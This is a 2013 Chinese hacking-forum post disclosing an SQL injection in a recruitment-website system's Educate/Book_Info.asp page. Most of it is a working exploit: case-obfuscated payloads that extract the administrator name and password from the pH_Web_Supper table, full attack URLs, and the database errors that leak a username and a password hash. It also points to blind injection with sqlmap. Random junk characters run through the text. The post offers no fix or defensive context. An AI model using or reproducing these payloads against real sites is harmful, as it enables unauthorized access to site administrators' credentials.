找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2321|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp ' P2 m" V( J9 @3 p6 _
1 x7 s9 o5 B* t5 i  [! |
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
+ J+ r" z/ I5 F; M' L
/ B7 |4 Z1 a& ]  a$ aexp:如下
( r$ n3 b' [( z  q. z查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)' z# m3 M! x3 `  p0 x6 _
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
# r7 T( V9 J2 s/ R* O$ L6 T
* G6 Z6 C. I# S/ e6 p) f! K& I5 J6 thttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)+ Y  @4 ?/ n8 W* Y% ~
- C9 G6 X' Q1 y5 p
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
/ T) I( u* e, `/ E, T8 K$ _: \1 Z
, H: |5 `1 `2 x* |" l$ R将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。  B. M9 A7 u. v( w
, L* V) E( C8 p1 r+ j
/Educate/Book_Info.asp,行 8
. C; C4 t' X7 n5 P) j' R% I
  }' S! |( d' V3 s7 c4 \$ f! B& Vhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
# X- Q" e$ d! }0 \6 {
' B3 d" s) o% `& @Microsoft OLE DB Provider for SQL Server 错误 '80040e07') q4 F4 }/ Z' |& r. E
. f8 G# I: m3 J& P- o
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
  f# X0 ~. C6 e# }9 [' w
" a9 E! T; g  t% m2 T/Educate/Book_Info.asp,行 8" u# I& M6 w0 F& m4 E: M; g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表